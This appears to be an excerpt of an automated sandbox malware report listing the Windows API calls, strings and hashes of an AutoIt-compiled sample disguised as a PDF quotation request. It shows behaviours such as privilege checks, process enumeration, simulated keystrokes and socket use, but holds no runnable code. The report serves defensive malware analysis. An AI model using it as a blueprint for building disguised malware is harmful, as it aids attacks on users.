                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                • String ID: @
                                                                                                                • API String ID: 4150878124-2766056989
                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe,00000104), ref: 00A71769
                                                                                                                • _free.LIBCMT ref: 00A71834
                                                                                                                • _free.LIBCMT ref: 00A7183E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$FileModuleName
                                                                                                                • String ID: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe
                                                                                                                • API String ID: 2506810119-1231057770
                                                                                                                APIs
                                                                                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00AAC306
                                                                                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 00AAC34C
                                                                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B11990,01165760), ref: 00AAC395
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Delete$InfoItem
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 135850232-4108050209
                                                                                                                APIs
                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00ADCC08,00000000,?,?,?,?), ref: 00AD44AA
                                                                                                                • GetWindowLongW.USER32 ref: 00AD44C7
                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AD44D7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long
                                                                                                                • String ID: SysTreeView32
                                                                                                                • API String ID: 847901565-1698111956
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AC335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00AC3077,?,?), ref: 00AC3378
                                                                                                                • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00AC307A
                                                                                                                • _wcslen.LIBCMT ref: 00AC309B
                                                                                                                • htons.WSOCK32(00000000,?,?,00000000), ref: 00AC3106
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                • String ID: 255.255.255.255
                                                                                                                • API String ID: 946324512-2422070025
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00AD3F40
                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00AD3F54
                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AD3F78
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window
                                                                                                                • String ID: SysMonthCal32
                                                                                                                • API String ID: 2326795674-1439706946
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00AD4705
                                                                                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00AD4713
                                                                                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00AD471A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$DestroyWindow
                                                                                                                • String ID: msctls_updown32
                                                                                                                • API String ID: 4014797782-2298589950
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen
                                                                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                • API String ID: 176396367-2734436370
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00AD3840
                                                                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00AD3850
                                                                                                                • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00AD3876
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$MoveWindow
                                                                                                                • String ID: Listbox
                                                                                                                • API String ID: 3315199576-2633736733
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 00AB4A08
                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00AB4A5C
                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,00ADCC08), ref: 00AB4AD0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                                • String ID: %lu
                                                                                                                • API String ID: 2507767853-685833217
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00AD424F
                                                                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00AD4264
                                                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00AD4271
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: msctls_trackbar32
                                                                                                                • API String ID: 3850602802-1010561917
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A46B57: _wcslen.LIBCMT ref: 00A46B6A
                                                                                                                  • Part of subcall function 00AA2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00AA2DC5
                                                                                                                  • Part of subcall function 00AA2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AA2DD6
                                                                                                                  • Part of subcall function 00AA2DA7: GetCurrentThreadId.KERNEL32 ref: 00AA2DDD
                                                                                                                  • Part of subcall function 00AA2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00AA2DE4
                                                                                                                • GetFocus.USER32 ref: 00AA2F78
                                                                                                                  • Part of subcall function 00AA2DEE: GetParent.USER32(00000000), ref: 00AA2DF9
                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00AA2FC3
                                                                                                                • EnumChildWindows.USER32(?,00AA303B), ref: 00AA2FEB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                • String ID: %s%d
                                                                                                                • API String ID: 1272988791-1110647743
                                                                                                                APIs
                                                                                                                • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00AD58C1
                                                                                                                • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00AD58EE
                                                                                                                • DrawMenuBar.USER32(?), ref: 00AD58FD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Menu$InfoItem$Draw
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 3227129158-4108050209
                                                                                                                APIs
                                                                                                                • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00A9D3BF
                                                                                                                • FreeLibrary.KERNEL32 ref: 00A9D3E5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                • API String ID: 3013587201-2590602151
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: __alldvrm$_strrchr
                                                                                                                • String ID:
                                                                                                                • API String ID: 1036877536-0
                                                                                                                APIs
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearInitInitializeUninitialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 1998397398-0
                                                                                                                APIs
                                                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00ADFC08,?), ref: 00AA05F0
                                                                                                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00ADFC08,?), ref: 00AA0608
                                                                                                                • CLSIDFromProgID.OLE32(?,?,00000000,00ADCC40,000000FF,?,00000000,00000800,00000000,?,00ADFC08,?), ref: 00AA062D
                                                                                                                • _memcmp.LIBVCRUNTIME ref: 00AA064E
                                                                                                                Similarity
                                                                                                                • API ID: FromProg$FreeTask_memcmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 314563124-0
                                                                                                                APIs
                                                                                                                Similarity
                                                                                                                • API ID: _free
                                                                                                                • String ID:
                                                                                                                • API String ID: 269201875-0
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(0116F540,?), ref: 00AD62E2
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00AD6315
                                                                                                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00AD6382
                                                                                                                Similarity
                                                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3880355969-0
                                                                                                                APIs
                                                                                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 00AC1AFD
                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AC1B0B
                                                                                                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00AC1B8A
                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AC1B94
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$socket
                                                                                                                • String ID:
                                                                                                                • API String ID: 1881357543-0
                                                                                                                APIs
                                                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00AB5783
                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 00AB57A9
                                                                                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00AB57CE
                                                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00AB57FA
                                                                                                                Similarity
                                                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 3321077145-0
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00A66D71,00000000,00000000,00A682D9,?,00A682D9,?,00000001,00A66D71,8BE85006,00000001,00A682D9,00A682D9), ref: 00A7D910
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A7D999
                                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00A7D9AB
                                                                                                                • __freea.LIBCMT ref: 00A7D9B4
                                                                                                                  • Part of subcall function 00A73820: RtlAllocateHeap.NTDLL(00000000,?,00B11444,?,00A5FDF5,?,?,00A4A976,00000010,00B11440,00A413FC,?,00A413C6,?,00A41129), ref: 00A73852
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                • String ID:
                                                                                                                • API String ID: 2652629310-0
                                                                                                                • Opcode ID: a25eda60c927b4c2d65599c01c6047007ed902e96eb012fd9e140f744181e0ea
                                                                                                                • Instruction ID: 900b39c66b24a4dccc1ab1329f1181693f554322f2f88b577a1210403cf16440
                                                                                                                • Opcode Fuzzy Hash: a25eda60c927b4c2d65599c01c6047007ed902e96eb012fd9e140f744181e0ea
                                                                                                                • Instruction Fuzzy Hash: E131AD72A0021AABDF25DFA4DC45EAE7BB5EF40310B158669FD09D7290EB35CD50CB90
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00AD5352
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AD5375
                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AD5382
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00AD53A8
                                                                                                                Similarity
                                                                                                                • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3340791633-0
                                                                                                                • Opcode ID: 03b345c0d8fb4aaa7ddaf8633dfd1442c2bf5d65cc53a06df5931565a3139e31
                                                                                                                • Instruction ID: ca99a48c33a0d532782c9dc8d4de20e4dadca9074da84e7236d202d87a31ad9b
                                                                                                                • Opcode Fuzzy Hash: 03b345c0d8fb4aaa7ddaf8633dfd1442c2bf5d65cc53a06df5931565a3139e31
                                                                                                                • Instruction Fuzzy Hash: A031B034E55A08EFEB349B74CC25BE87775AB05390F984103FA229E3E1C7B49950EB41
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00AAABF1
                                                                                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 00AAAC0D
                                                                                                                • PostMessageW.USER32(00000000,00000101,00000000), ref: 00AAAC74
                                                                                                                • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00AAACC6
                                                                                                                Similarity
                                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 432972143-0
                                                                                                                • Opcode ID: 81d9bffd148b5c61b184e612eb9bdca2b9870c91d47e4d84d350d5bfd4c2ec98
                                                                                                                • Instruction ID: 22296b88f0f02e83c8625a4f7e615e0db09b99d7e5cf1d3d44703a0f566679d3
                                                                                                                • Opcode Fuzzy Hash: 81d9bffd148b5c61b184e612eb9bdca2b9870c91d47e4d84d350d5bfd4c2ec98
                                                                                                                • Instruction Fuzzy Hash: A131E530A406186FFB35CFA588087FA7BF6ABA6330F04821AE485931D1D3798985D752
                                                                                                                APIs
                                                                                                                • ClientToScreen.USER32(?,?), ref: 00AD769A
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00AD7710
                                                                                                                • PtInRect.USER32(?,?,00AD8B89), ref: 00AD7720
                                                                                                                • MessageBeep.USER32(00000000), ref: 00AD778C
                                                                                                                Similarity
                                                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1352109105-0
                                                                                                                • Opcode ID: bffac7b6bd1eb1433b5f428173998f45cd3860aeedd6e9853cacddef74e6b282
                                                                                                                • Instruction ID: f36da383d933415d8082ccefd0c3d038f531a196f917bb43b72ecaa8c637cff8
                                                                                                                • Opcode Fuzzy Hash: bffac7b6bd1eb1433b5f428173998f45cd3860aeedd6e9853cacddef74e6b282
                                                                                                                • Instruction Fuzzy Hash: 87419C34A09215DFCB05CF98C894EAD77F4BB48350F5489AAE5269B361E730E942CB90
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32 ref: 00AD16EB
                                                                                                                  • Part of subcall function 00AA3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AA3A57
                                                                                                                  • Part of subcall function 00AA3A3D: GetCurrentThreadId.KERNEL32 ref: 00AA3A5E
                                                                                                                  • Part of subcall function 00AA3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00AA25B3), ref: 00AA3A65
                                                                                                                • GetCaretPos.USER32(?), ref: 00AD16FF
                                                                                                                • ClientToScreen.USER32(00000000,?), ref: 00AD174C
                                                                                                                • GetForegroundWindow.USER32 ref: 00AD1752
                                                                                                                Similarity
                                                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2759813231-0
                                                                                                                • Opcode ID: f7461b5071c93ff6d87479e568ae594089613cbb1c1d00628d792472f5ac5e3c
                                                                                                                • Instruction ID: 5c87a1cafe09a7932c8db4d6a34f55bae9fec1d082efbda6833eac7710e31372
                                                                                                                • Opcode Fuzzy Hash: f7461b5071c93ff6d87479e568ae594089613cbb1c1d00628d792472f5ac5e3c
                                                                                                                • Instruction Fuzzy Hash: BA314175D01249AFCB00DFA9C981CAEB7F9EF89314B5080AAE416E7211D735DE45CFA0
                                                                                                                APIs
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00AAD501
                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00AAD50F
                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00AAD52F
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00AAD5DC
                                                                                                                Similarity
                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                • String ID:
                                                                                                                • API String ID: 420147892-0
                                                                                                                • Opcode ID: 8da44203f4140eee18c5ee25fd6c164bcd2cd6d80f5810c7b9e2292a62291126
                                                                                                                • Instruction ID: a4b7d23e6156ea722fb7a289135d74def60d3cd2880f2a57e0cbc2a6051a15ae
                                                                                                                • Opcode Fuzzy Hash: 8da44203f4140eee18c5ee25fd6c164bcd2cd6d80f5810c7b9e2292a62291126
                                                                                                                • Instruction Fuzzy Hash: 75319E321083019FD301EF54C885AAFBBE8AFDA354F50092DF586871A2EB719949CB92
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A59BB2
                                                                                                                • GetCursorPos.USER32(?), ref: 00AD9001
                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00A97711,?,?,?,?,?), ref: 00AD9016
                                                                                                                • GetCursorPos.USER32(?), ref: 00AD905E
                                                                                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00A97711,?,?,?), ref: 00AD9094
                                                                                                                Similarity
                                                                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2864067406-0
                                                                                                                • Opcode ID: 37693c19cac64939ca6e90ed009d1b6d6b5df25dbcb3f5a2b995286c7766fea1
                                                                                                                • Instruction ID: 6d5db6af3fd447686501d2802c14cdb16b93ee57157ba34dc5ad51fbb06bf1db
                                                                                                                • Opcode Fuzzy Hash: 37693c19cac64939ca6e90ed009d1b6d6b5df25dbcb3f5a2b995286c7766fea1
                                                                                                                • Instruction Fuzzy Hash: E221BF35600018EFCB259F98E858EEB3BB9FF49360F448156F9068B261C7319991DB61
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNEL32(?,00ADCB68), ref: 00AAD2FB
                                                                                                                • GetLastError.KERNEL32 ref: 00AAD30A
                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00AAD319
                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00ADCB68), ref: 00AAD376
                                                                                                                Similarity
                                                                                                                • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 2267087916-0
                                                                                                                • Opcode ID: f1ba35e03cb7e23d84639728f21272c804c7e93b7b32727c3e5c105e1eeded5e
                                                                                                                • Instruction ID: 97b95ec400ebc94117b89451fbcd34c607971628f6344cd840c555046fa0d1ae
                                                                                                                • Opcode Fuzzy Hash: f1ba35e03cb7e23d84639728f21272c804c7e93b7b32727c3e5c105e1eeded5e
                                                                                                                • Instruction Fuzzy Hash: 0B2182745052019FCB00EF68C9814AFB7E4AE96324F504A1EF4E6DB2E1D731D946CBA3
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AA1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AA102A
                                                                                                                  • Part of subcall function 00AA1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AA1036
                                                                                                                  • Part of subcall function 00AA1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AA1045
                                                                                                                  • Part of subcall function 00AA1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AA104C
                                                                                                                  • Part of subcall function 00AA1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AA1062
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00AA15BE
                                                                                                                • _memcmp.LIBVCRUNTIME ref: 00AA15E1
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AA1617
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00AA161E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 1592001646-0
                                                                                                                APIs
                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 00AD280A
                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00AD2824
                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00AD2832
                                                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00AD2840
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long$AttributesLayered
                                                                                                                • String ID:
                                                                                                                • API String ID: 2169480361-0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AA8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00AA790A,?,000000FF,?,00AA8754,00000000,?,0000001C,?,?), ref: 00AA8D8C
                                                                                                                  • Part of subcall function 00AA8D7D: lstrcpyW.KERNEL32(00000000,?,?,00AA790A,?,000000FF,?,00AA8754,00000000,?,0000001C,?,?,00000000), ref: 00AA8DB2
                                                                                                                  • Part of subcall function 00AA8D7D: lstrcmpiW.KERNEL32(00000000,?,00AA790A,?,000000FF,?,00AA8754,00000000,?,0000001C,?,?), ref: 00AA8DE3
                                                                                                                • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00AA8754,00000000,?,0000001C,?,?,00000000), ref: 00AA7923
                                                                                                                • lstrcpyW.KERNEL32(00000000,?,?,00AA8754,00000000,?,0000001C,?,?,00000000), ref: 00AA7949
                                                                                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,00AA8754,00000000,?,0000001C,?,?,00000000), ref: 00AA7984
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: lstrcmpilstrcpylstrlen
                                                                                                                • String ID: cdecl
                                                                                                                • API String ID: 4031866154-3896280584
                                                                                                                APIs
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AD7D0B
                                                                                                                • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00AD7D2A
                                                                                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00AD7D42
                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00ABB7AD,00000000), ref: 00AD7D6B
                                                                                                                  • Part of subcall function 00A59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A59BB2
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long
                                                                                                                • String ID:
                                                                                                                • API String ID: 847901565-0
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001060,?,00000004), ref: 00AD56BB
                                                                                                                • _wcslen.LIBCMT ref: 00AD56CD
                                                                                                                • _wcslen.LIBCMT ref: 00AD56D8
                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AD5816
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend_wcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 455545452-0
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00AA1A47
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AA1A59
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AA1A6F
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AA1A8A
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                APIs
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00AAE1FD
                                                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 00AAE230
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00AAE246
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00AAE24D
                                                                                                                APIs
                                                                                                                • CreateThread.KERNEL32(00000000,?,00A6CFF9,00000000,00000004,00000000), ref: 00A6D218
                                                                                                                • GetLastError.KERNEL32 ref: 00A6D224
                                                                                                                • __dosmaperr.LIBCMT ref: 00A6D22B
                                                                                                                • ResumeThread.KERNEL32(00000000), ref: 00A6D249
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A4604C
                                                                                                                • GetStockObject.GDI32(00000011), ref: 00A46060
                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00A4606A
                                                                                                                APIs
                                                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 00A63B56
                                                                                                                  • Part of subcall function 00A63AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00A63AD2
                                                                                                                  • Part of subcall function 00A63AA3: ___AdjustPointer.LIBCMT ref: 00A63AED
                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 00A63B6B
